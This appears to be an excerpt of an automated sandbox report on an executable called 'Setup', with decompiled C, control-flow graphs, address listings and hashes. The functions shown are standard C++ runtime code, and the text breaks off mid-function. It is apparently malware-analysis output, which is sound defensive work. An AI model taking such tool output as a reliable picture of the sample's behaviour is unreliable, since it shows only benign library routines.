                                                                                                                                                                                              0x00402f97
                                                                                                                                                                                              0x00402f97
                                                                                                                                                                                              0x00402f97
                                                                                                                                                                                              0x00402f9e
                                                                                                                                                                                              0x00402fa3
                                                                                                                                                                                              0x00402fac
                                                                                                                                                                                              0x00402fd6
                                                                                                                                                                                              0x00402fd9
                                                                                                                                                                                              0x00402fdb
                                                                                                                                                                                              0x00402fe2
                                                                                                                                                                                              0x00402fe6
                                                                                                                                                                                              0x00403001
                                                                                                                                                                                              0x00403006
                                                                                                                                                                                              0x004030d1
                                                                                                                                                                                              0x004030d1
                                                                                                                                                                                              0x004030d4
                                                                                                                                                                                              0x004030da
                                                                                                                                                                                              0x004030dd
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00403015
                                                                                                                                                                                              0x00403028
                                                                                                                                                                                              0x00403030
                                                                                                                                                                                              0x00403040
                                                                                                                                                                                              0x00403048
                                                                                                                                                                                              0x0040304a
                                                                                                                                                                                              0x0040305d
                                                                                                                                                                                              0x00403067
                                                                                                                                                                                              0x0040306a
                                                                                                                                                                                              0x0040306c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040306e
                                                                                                                                                                                              0x00403070
                                                                                                                                                                                              0x00403071
                                                                                                                                                                                              0x00403073
                                                                                                                                                                                              0x004030a9
                                                                                                                                                                                              0x004030ac
                                                                                                                                                                                              0x004030af
                                                                                                                                                                                              0x0040310f
                                                                                                                                                                                              0x00403126
                                                                                                                                                                                              0x00403126
                                                                                                                                                                                              0x00403128
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00403116
                                                                                                                                                                                              0x00403119
                                                                                                                                                                                              0x00403119
                                                                                                                                                                                              0x0040311e
                                                                                                                                                                                              0x0040311f
                                                                                                                                                                                              0x00403125
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004030b1
                                                                                                                                                                                              0x004030c4
                                                                                                                                                                                              0x004030cc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004030cc
                                                                                                                                                                                              0x00403075
                                                                                                                                                                                              0x00403075
                                                                                                                                                                                              0x00403078
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040307a
                                                                                                                                                                                              0x0040307a
                                                                                                                                                                                              0x0040307d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040307f
                                                                                                                                                                                              0x00403099
                                                                                                                                                                                              0x0040312a
                                                                                                                                                                                              0x0040312a
                                                                                                                                                                                              0x0040312a
                                                                                                                                                                                              0x0040307d
                                                                                                                                                                                              0x00403078
                                                                                                                                                                                              0x00403073
                                                                                                                                                                                              0x004030e6
                                                                                                                                                                                              0x004030ed
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004030f2
                                                                                                                                                                                              0x004030e3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00402fe8
                                                                                                                                                                                              0x00402fed
                                                                                                                                                                                              0x00402ff4
                                                                                                                                                                                              0x00402ff6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00402ff8
                                                                                                                                                                                              0x00402ff8
                                                                                                                                                                                              0x00402ff6
                                                                                                                                                                                              0x00402fdd
                                                                                                                                                                                              0x00402fdd
                                                                                                                                                                                              0x00402fdd
                                                                                                                                                                                              0x00402fbe
                                                                                                                                                                                              0x00402fc1
                                                                                                                                                                                              0x00402fc3
                                                                                                                                                                                              0x00402fcb
                                                                                                                                                                                              0x00402fcd
                                                                                                                                                                                              0x00402fd0
                                                                                                                                                                                              0x00402fd5

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00402F9E
                                                                                                                                                                                              • _fgetc.LIBCMT ref: 004030D4
                                                                                                                                                                                                • Part of subcall function 00402000: std::_String_base::_Xlen.LIBCPMT ref: 0040201A
                                                                                                                                                                                              • _memcpy_s.LIBCMT ref: 00403099
                                                                                                                                                                                              • _ungetc.LIBCMT ref: 0040311F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 9762108-0
                                                                                                                                                                                              • Opcode ID: 9a693fcc90b3e6fda9c3a6ce013caeee60b9785b9a7295113ae95e6727d65c00
                                                                                                                                                                                              • Instruction ID: 9c8333c99ca74f7f6a11461ea6f5d658c171b391bfeb88374c99f6d4545d423f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a693fcc90b3e6fda9c3a6ce013caeee60b9785b9a7295113ae95e6727d65c00
                                                                                                                                                                                              • Instruction Fuzzy Hash: D251B072A041099FCB14DBB5C9859EEB7B9AF08344F20453FF052F72D1EA78E9449B58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0041F6A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 192COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 349 41f6a0-41f6ea call 4011a0 call 41f900 354 41f71d 349->354 355 41f6ec-41f701 call 41f900 349->355 356 41f724-41f743 call 41eb90 call 41ec40 354->356 355->354 360 41f703-41f71b call 41f900 355->360 366 41f753-41f772 call 41ddc0 356->366 367 41f745-41f74e 356->367 360->356 373 41f774 366->373 374 41f7df-41f7e3 366->374 368 41f8c1-41f8f8 call 41e1a0 call 41ec10 367->368 376 41f77f-41f783 373->376 377 41f7e5-41f801 call 41e1d0 call 41ffa0 374->377 378 41f814-41f818 374->378 376->374 379 41f785-41f7d0 call 41e630 call 41e1d0 call 41ea00 call 4010b0 call 401090 376->379 392 41f806-41f809 377->392 380 41f885-41f8ba call 41f920 378->380 381 41f81a 378->381 412 41f7d2-41f7db 379->412 413 41f7dd 379->413 380->368 387 41f825-41f829 381->387 387->380 391 41f82b-41f876 call 41e630 call 41e1d0 call 41ea00 call 4010b0 call 401090 387->391 416 41f883 391->416 417 41f878-41f881 391->417 392->378 396 41f80b-41f811 392->396 396->378 412->374 413->376 416->387 417->380
                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                              			E0041F6A0(void* __ecx, intOrPtr* _a4, char _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				signed int _v64;
				intOrPtr _t84;
				signed int _t89;
				signed char _t99;
				signed char _t104;
				void* _t108;
				signed int _t110;
				signed char _t111;
				signed char _t117;
				signed int _t119;
				void* _t125;
				signed int _t156;
				intOrPtr _t197;
				intOrPtr _t198;
				void* _t199;

				_push(0xffffffff);
				_push(E00423BE0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t197;
				_push(__ecx);
				_t198 = _t197 - 0x2c;
				_v20 = _t198;
				_v24 = 0;
				_t3 =  &_a8; // 0x455ce0
				_t84 = E004011A0( *_t3);
				_t199 = _t198 + 4;
				_v28 = _t84;
				if(E0041F900(_a4 +  *((intOrPtr*)( *_a4 + 4))) <= 0) {
					L3:
					_v64 = 0;
				} else {
					_t125 = E0041F900(_a4 +  *((intOrPtr*)( *_a4 + 4)));
					_t201 = _t125 - _v28;
					if(_t125 <= _v28) {
						goto L3;
					} else {
						_v64 = E0041F900(_a4 +  *((intOrPtr*)( *_a4 + 4))) - _v28;
					}
				}
				_v32 = _v64;
				E0041EB90( &_v40, _t201, _a4);
				if((E0041EC40( &_v40) & 0x000000ff) != 0) {
					_v8 = 0;
					_t89 = E0041DDC0(_a4 +  *((intOrPtr*)( *_a4 + 4)));
					__eflags = (_t89 & 0x000001c0) - 0x40;
					if((_t89 & 0x000001c0) != 0x40) {
						while(1) {
							__eflags = _v32;
							if(_v32 <= 0) {
								goto L13;
							}
							_t111 = E0041E630(_a4 +  *((intOrPtr*)( *_a4 + 4)));
							_v44 = E0041EA00(E0041E1D0(_a4 +  *((intOrPtr*)( *_a4 + 4))), _t111 & 0x000000ff);
							_v48 = E004010B0(_t114);
							_t117 = E00401090( &_v48,  &_v44);
							_t199 = _t199 + 8;
							__eflags = _t117 & 0x000000ff;
							if((_t117 & 0x000000ff) == 0) {
								_t119 = _v32 - 1;
								__eflags = _t119;
								_v32 = _t119;
								continue;
							} else {
								_v24 = _v24 | 0x00000004;
							}
							goto L13;
						}
					}
					L13:
					__eflags = _v24;
					if(_v24 == 0) {
						_t46 =  &_a8; // 0x455ce0
						_t108 = E0041FFA0(E0041E1D0(_a4 +  *((intOrPtr*)( *_a4 + 4))),  *_t46, _v28); // executed
						__eflags = _t108 - _v28;
						if(_t108 != _v28) {
							_t110 = _v24 | 0x00000004;
							__eflags = _t110;
							_v24 = _t110;
						}
					}
					__eflags = _v24;
					if(_v24 == 0) {
						while(1) {
							__eflags = _v32;
							if(_v32 <= 0) {
								goto L23;
							}
							_t99 = E0041E630(_a4 +  *((intOrPtr*)( *_a4 + 4)));
							_v52 = E0041EA00(E0041E1D0(_a4 +  *((intOrPtr*)( *_a4 + 4))), _t99 & 0x000000ff);
							_v56 = E004010B0(_t102);
							_t104 = E00401090( &_v56,  &_v52);
							_t199 = _t199 + 8;
							__eflags = _t104 & 0x000000ff;
							if((_t104 & 0x000000ff) == 0) {
								_t156 = _v32 - 1;
								__eflags = _t156;
								_v32 = _t156;
								continue;
							} else {
								_v24 = _v24 | 0x00000004;
							}
							goto L23;
						}
					}
					L23:
					E0041F920(_a4 +  *((intOrPtr*)( *_a4 + 4)), 0);
					_v8 = 0xffffffff;
				} else {
					_v24 = _v24 | 0x00000004;
				}
				E0041E1A0(_a4 +  *((intOrPtr*)( *_a4 + 4)), _v24, 0);
				_v60 = _a4;
				E0041EC10( &_v40, _a4 +  *((intOrPtr*)( *_a4 + 4)));
				_t81 =  &_v16; // 0x455ce0
				 *[fs:0x0] =  *_t81;
				return _v60;
			}






























                                                                                                                                                                                              0x0041f6a3
                                                                                                                                                                                              0x0041f6a5
                                                                                                                                                                                              0x0041f6b0
                                                                                                                                                                                              0x0041f6b1
                                                                                                                                                                                              0x0041f6b8
                                                                                                                                                                                              0x0041f6b9
                                                                                                                                                                                              0x0041f6bf
                                                                                                                                                                                              0x0041f6c2
                                                                                                                                                                                              0x0041f6c9
                                                                                                                                                                                              0x0041f6cd
                                                                                                                                                                                              0x0041f6d2
                                                                                                                                                                                              0x0041f6d5
                                                                                                                                                                                              0x0041f6ea
                                                                                                                                                                                              0x0041f71d
                                                                                                                                                                                              0x0041f71d
                                                                                                                                                                                              0x0041f6ec
                                                                                                                                                                                              0x0041f6f9
                                                                                                                                                                                              0x0041f6fe
                                                                                                                                                                                              0x0041f701
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041f703
                                                                                                                                                                                              0x0041f718
                                                                                                                                                                                              0x0041f718
                                                                                                                                                                                              0x0041f701
                                                                                                                                                                                              0x0041f727
                                                                                                                                                                                              0x0041f731
                                                                                                                                                                                              0x0041f743
                                                                                                                                                                                              0x0041f753
                                                                                                                                                                                              0x0041f765
                                                                                                                                                                                              0x0041f76f
                                                                                                                                                                                              0x0041f772
                                                                                                                                                                                              0x0041f77f
                                                                                                                                                                                              0x0041f77f
                                                                                                                                                                                              0x0041f783
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041f790
                                                                                                                                                                                              0x0041f7b0
                                                                                                                                                                                              0x0041f7b8
                                                                                                                                                                                              0x0041f7c3
                                                                                                                                                                                              0x0041f7c8
                                                                                                                                                                                              0x0041f7ce
                                                                                                                                                                                              0x0041f7d0
                                                                                                                                                                                              0x0041f779
                                                                                                                                                                                              0x0041f779
                                                                                                                                                                                              0x0041f77c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041f7d2
                                                                                                                                                                                              0x0041f7d8
                                                                                                                                                                                              0x0041f7d8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041f7d0
                                                                                                                                                                                              0x0041f77f
                                                                                                                                                                                              0x0041f7df
                                                                                                                                                                                              0x0041f7df
                                                                                                                                                                                              0x0041f7e3
                                                                                                                                                                                              0x0041f7e9
                                                                                                                                                                                              0x0041f801
                                                                                                                                                                                              0x0041f806
                                                                                                                                                                                              0x0041f809
                                                                                                                                                                                              0x0041f80e
                                                                                                                                                                                              0x0041f80e
                                                                                                                                                                                              0x0041f811
                                                                                                                                                                                              0x0041f811
                                                                                                                                                                                              0x0041f809
                                                                                                                                                                                              0x0041f814
                                                                                                                                                                                              0x0041f818
                                                                                                                                                                                              0x0041f825
                                                                                                                                                                                              0x0041f825
                                                                                                                                                                                              0x0041f829
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041f836
                                                                                                                                                                                              0x0041f856
                                                                                                                                                                                              0x0041f85e
                                                                                                                                                                                              0x0041f869
                                                                                                                                                                                              0x0041f86e
                                                                                                                                                                                              0x0041f874
                                                                                                                                                                                              0x0041f876
                                                                                                                                                                                              0x0041f81f
                                                                                                                                                                                              0x0041f81f
                                                                                                                                                                                              0x0041f822
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041f878
                                                                                                                                                                                              0x0041f87e
                                                                                                                                                                                              0x0041f87e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041f876
                                                                                                                                                                                              0x0041f825
                                                                                                                                                                                              0x0041f885
                                                                                                                                                                                              0x0041f892
                                                                                                                                                                                              0x0041f8ba
                                                                                                                                                                                              0x0041f745
                                                                                                                                                                                              0x0041f74b
                                                                                                                                                                                              0x0041f74b
                                                                                                                                                                                              0x0041f8d2
                                                                                                                                                                                              0x0041f8da
                                                                                                                                                                                              0x0041f8e0
                                                                                                                                                                                              0x0041f8e8
                                                                                                                                                                                              0x0041f8eb
                                                                                                                                                                                              0x0041f8f8

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 004011A0: _strlen.LIBCMT ref: 004011A7
                                                                                                                                                                                              • std::ios_base::width.LIBCPMTD ref: 0041F892
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _strlenstd::ios_base::width
                                                                                                                                                                                              • String ID: \E$\E
                                                                                                                                                                                              • API String ID: 3171587704-2746232386
                                                                                                                                                                                              • Opcode ID: d515f0f213a3b8be3a0c4423c115108704b78f36c7b17a4d1d83fccc65618ffe
                                                                                                                                                                                              • Instruction ID: e9fb74d85b7b10b05e604b834e942f40454090809d092c64f120b464f5c44820
                                                                                                                                                                                              • Opcode Fuzzy Hash: d515f0f213a3b8be3a0c4423c115108704b78f36c7b17a4d1d83fccc65618ffe
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D814074900109EFCB04EF55C591AEEBBB1FF44348F10852AE916AB391DB38EA85CBD5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0041F950 Relevance: 3.2, APIs: 2, Instructions: 174COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                                                              			E0041F950(void* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				char _v32;
				signed char _v33;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t70;
				intOrPtr _t81;
				signed char _t92;
				signed char _t93;
				signed char _t94;
				signed char _t96;
				void* _t104;
				void* _t108;
				void* _t166;
				intOrPtr _t170;
				intOrPtr _t171;
				void* _t172;
				void* _t173;
				void* _t174;

				_push(0xffffffff);
				_push(E00423BF0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t170;
				_push(__ecx);
				_t171 = _t170 - 0x2c;
				_push(_t108);
				_push(_t168);
				_push(_t166);
				_v20 = _t171;
				_v24 = 0;
				_v33 = 0;
				E0041E390( &_v32, _a4, 0); // executed
				_t70 = E0041EC40( &_v32);
				_t175 = _t70 & 0x000000ff;
				if((_t70 & 0x000000ff) != 0) {
					_t81 = E0041EE80(_t108, _t166, _t175, E0041DDE0(_a4 +  *((intOrPtr*)( *_a4 + 4)),  &_v52));
					_t172 = _t171 + 4;
					_v40 = _t81;
					E0041DD10( &_v52);
					E00401720(_t108, _a8, _t166, _t168, 0, 0xffffffff);
					_v8 = 0;
					if(E0041F900(_a4 +  *((intOrPtr*)( *_a4 + 4))) <= 0) {
						L4:
						_v64 = E00401A70(_a8);
					} else {
						_t104 = E0041F900(_a4 +  *((intOrPtr*)( *_a4 + 4)));
						_t168 = _t104;
						if(_t104 >= E00401A70(_a8)) {
							goto L4;
						} else {
							_v64 = E0041F900(_a4 +  *((intOrPtr*)( *_a4 + 4)));
						}
					}
					_v44 = _v64;
					_v48 = E0041E870(E0041E1D0(_a4 +  *((intOrPtr*)( *_a4 + 4))));
					while(_v44 > 0) {
						_v56 = E004010B0(_t89);
						_t92 = E00401090( &_v56,  &_v48);
						_t173 = _t172 + 8;
						if((_t92 & 0x000000ff) == 0) {
							_t93 = E004014C0( &_v48);
							_t174 = _t173 + 4;
							_t94 = E0041E820(_v40, 0x48, _t93 & 0x000000ff);
							__eflags = _t94 & 0x000000ff;
							if((_t94 & 0x000000ff) == 0) {
								_t96 = E004014C0( &_v48);
								_t172 = _t174 + 4;
								E00402000(_t108, _a8, _t166, _t168, 1, _t96 & 0x000000ff);
								_v33 = 1;
								_v44 = _v44 - 1;
								__eflags = _a4 +  *((intOrPtr*)( *_a4 + 4));
								_v48 = E0041E8C0(E0041E1D0(_a4 +  *((intOrPtr*)( *_a4 + 4))));
								continue;
							} else {
							}
						} else {
							_v24 = _v24 | 0x00000001;
						}
						break;
					}
					_v8 = 0xffffffff;
				}
				E0041F920(_a4 +  *((intOrPtr*)( *_a4 + 4)), 0);
				if((_v33 & 0x000000ff) == 0) {
					_v24 = _v24 | 0x00000002;
				}
				E0041E1A0(_a4 +  *((intOrPtr*)( *_a4 + 4)), _v24, 0);
				_v60 = _a4;
				E0041E370( &_v32);
				 *[fs:0x0] = _v16;
				return _v60;
			}

































                                                                                                                                                                                              0x0041f953
                                                                                                                                                                                              0x0041f955
                                                                                                                                                                                              0x0041f960
                                                                                                                                                                                              0x0041f961
                                                                                                                                                                                              0x0041f968
                                                                                                                                                                                              0x0041f969
                                                                                                                                                                                              0x0041f96c
                                                                                                                                                                                              0x0041f96d
                                                                                                                                                                                              0x0041f96e
                                                                                                                                                                                              0x0041f96f
                                                                                                                                                                                              0x0041f972
                                                                                                                                                                                              0x0041f979
                                                                                                                                                                                              0x0041f986
                                                                                                                                                                                              0x0041f98e
                                                                                                                                                                                              0x0041f996
                                                                                                                                                                                              0x0041f998
                                                                                                                                                                                              0x0041f9b5
                                                                                                                                                                                              0x0041f9ba
                                                                                                                                                                                              0x0041f9bd
                                                                                                                                                                                              0x0041f9c3
                                                                                                                                                                                              0x0041f9cf
                                                                                                                                                                                              0x0041f9d4
                                                                                                                                                                                              0x0041f9ef
                                                                                                                                                                                              0x0041fa28
                                                                                                                                                                                              0x0041fa30
                                                                                                                                                                                              0x0041f9f1
                                                                                                                                                                                              0x0041f9fe
                                                                                                                                                                                              0x0041fa03
                                                                                                                                                                                              0x0041fa0f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041fa11
                                                                                                                                                                                              0x0041fa23
                                                                                                                                                                                              0x0041fa23
                                                                                                                                                                                              0x0041fa0f
                                                                                                                                                                                              0x0041fa36
                                                                                                                                                                                              0x0041fa50
                                                                                                                                                                                              0x0041fa78
                                                                                                                                                                                              0x0041fa83
                                                                                                                                                                                              0x0041fa8e
                                                                                                                                                                                              0x0041fa93
                                                                                                                                                                                              0x0041fa9b
                                                                                                                                                                                              0x0041faae
                                                                                                                                                                                              0x0041fab3
                                                                                                                                                                                              0x0041fabf
                                                                                                                                                                                              0x0041fac7
                                                                                                                                                                                              0x0041fac9
                                                                                                                                                                                              0x0041fad3
                                                                                                                                                                                              0x0041fad8
                                                                                                                                                                                              0x0041fae4
                                                                                                                                                                                              0x0041fae9
                                                                                                                                                                                              0x0041fa5b
                                                                                                                                                                                              0x0041fa66
                                                                                                                                                                                              0x0041fa75
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041facb
                                                                                                                                                                                              0x0041fa9d
                                                                                                                                                                                              0x0041faa3
                                                                                                                                                                                              0x0041faa3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041fa9b
                                                                                                                                                                                              0x0041fb17
                                                                                                                                                                                              0x0041fb17
                                                                                                                                                                                              0x0041fb2d
                                                                                                                                                                                              0x0041fb38
                                                                                                                                                                                              0x0041fb40
                                                                                                                                                                                              0x0041fb40
                                                                                                                                                                                              0x0041fb56
                                                                                                                                                                                              0x0041fb5e
                                                                                                                                                                                              0x0041fb64
                                                                                                                                                                                              0x0041fb6f
                                                                                                                                                                                              0x0041fb7c

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • std::ios_base::width.LIBCPMTD ref: 0041FB2D
                                                                                                                                                                                                • Part of subcall function 0041DDE0: std::locale::locale.LIBCPMTD ref: 0041DDF1
                                                                                                                                                                                                • Part of subcall function 0041EE80: std::_Lockit::_Lockit.LIBCPMT ref: 0041EE8B
                                                                                                                                                                                                • Part of subcall function 0041EE80: int.LIBCPMTD ref: 0041EE9D
                                                                                                                                                                                                • Part of subcall function 0041EE80: std::locale::_Getfacet.LIBCPMTD ref: 0041EEAC
                                                                                                                                                                                                • Part of subcall function 0041DD10: std::locale::facet::_Decref.LIBCPMTD ref: 0041DD26
                                                                                                                                                                                                • Part of subcall function 00401A70: allocator.LIBCPMTD ref: 00401A7C
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DecrefGetfacetLockitLockit::_allocatorstd::_std::ios_base::widthstd::locale::_std::locale::facet::_std::locale::locale
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3358078372-0
                                                                                                                                                                                              • Opcode ID: 83b03e066fbdae92de5adf023a5dd34afa66bdde7a93566f08366fe2fbf14f7e
                                                                                                                                                                                              • Instruction ID: 1f938f82e20fe98d2b8270f7c8e69231c9aaaa7b462fd30902b61f7b9bf74eb9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 83b03e066fbdae92de5adf023a5dd34afa66bdde7a93566f08366fe2fbf14f7e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 51614374A00208AFCB04DF65D491BEE77B1AF84358F14C52EF90A6B391DB39E945CB94
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0040DB59 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 486 40db59-40db6a call 40db2e ExitProcess
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0040DB59(int _a4) {

				E0040DB2E(_a4);
				ExitProcess(_a4);
			}



                                                                                                                                                                                              0x0040db61
                                                                                                                                                                                              0x0040db6a

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___crtCorExitProcess.LIBCMT ref: 0040DB61
                                                                                                                                                                                                • Part of subcall function 0040DB2E: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040DB66,00000010,?,0040C428,000000FF,0000001E,?,0040A872,00000010,00000001,00000010,?,0040C626,00000018), ref: 0040DB38
                                                                                                                                                                                                • Part of subcall function 0040DB2E: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040DB48
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040DB6A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2427264223-0
                                                                                                                                                                                              • Opcode ID: e984f389b98bda66c5b48b76a9c1147826bd8a6af3e31583a9ac8fb9929b9697
                                                                                                                                                                                              • Instruction ID: 63ef05547cf14ebf415df550ccfdd4134a131be5b5675c7f6541da01ae00aa70
                                                                                                                                                                                              • Opcode Fuzzy Hash: e984f389b98bda66c5b48b76a9c1147826bd8a6af3e31583a9ac8fb9929b9697
                                                                                                                                                                                              • Instruction Fuzzy Hash: F3B09232000148BBCB152F53EC0AD593F6AFB803A0B514035F9090A071DF72ED92DA89
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0041E650 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                                                              			E0041E650(intOrPtr* __ecx, void* __eflags, signed char _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr* _v40;
				void* __ebx;
				void* __edi;
				signed int _t52;
				signed int _t58;
				intOrPtr _t62;
				signed char _t69;
				signed char _t71;
				signed char _t72;
				void* _t80;
				void* _t133;
				intOrPtr _t137;
				intOrPtr _t138;
				void* _t139;
				void* _t140;

				_push(0xffffffff);
				_push(E00423BC0);
